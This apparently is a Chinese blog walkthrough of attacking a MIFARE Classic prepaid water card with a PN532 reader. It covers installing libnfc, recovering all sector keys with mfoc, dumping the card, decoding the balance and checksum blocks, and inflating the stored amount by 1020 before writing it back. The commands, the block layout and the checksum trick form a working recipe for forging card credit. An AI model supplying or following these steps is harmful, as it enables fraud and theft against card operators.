0x01买板子
最便宜的板子pn532,需要买usb转串口的设备,对于kali-rolling,好像是通杀的,无论是PL2303,ch34X,FT232RL(没测试,这个更高端应该没问题),cp2102。
把排针(不是电子专业的,不懂学名)焊接到pn532上,用杜邦线将两个板子连接,hardware is ok.
0x02安装软件
需要安装libnfc,可到githu上下载,解压后
cd xxx
./configure
make
sudo make install
新建`/usr/local/etc/nfc/libnfc.conf
abc@kali:/usr/local/etc/nfc$ cat libnfc.conf
#allow_autoscan = true
device.connstring = "pn532_uart:/dev/ttyUSB0"
安装mfoc、mfcuk,好像要编译下,因kali自带,这里不再说明。
0x03开始
连接设备,开工,拿水卡试下
abc@kali:~$ nfc-list
nfc-list uses libnfc 1.7.1
NFC device: pn532_uart:/dev/ttyUSB0 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 71 3d b3 1e
SAK (SEL_RES): 08
可以识别, 安装正确.
解码
abc@kali:~/nfc$ mfoc -f key -O tmp.mfd
...
Auth with all sectors succeeded, dumping keys to a file!
...
搞定密码
0x04分析数据
这里的数据较为简单, bock17和18储存金额和校验位, 找到校验位的规律为循环出现, 因此, 基于原有数据, 如00 00对应5a 78, 金额加上1020, 得到10 20对应FC 03, 修改结束.
写入到原卡或者空白卡片
abc@kali:~/nfc$ nfc-mfclassic w b tmp.mfd tmp.mfd
0x05
测试, 拿到卡机上测试,发现无法读取, 回到04, 将校验位加减1,重新写入, 测试ok.
0x06
m1卡已经完全失去了安全性, 犯罪成本之低,,,,,,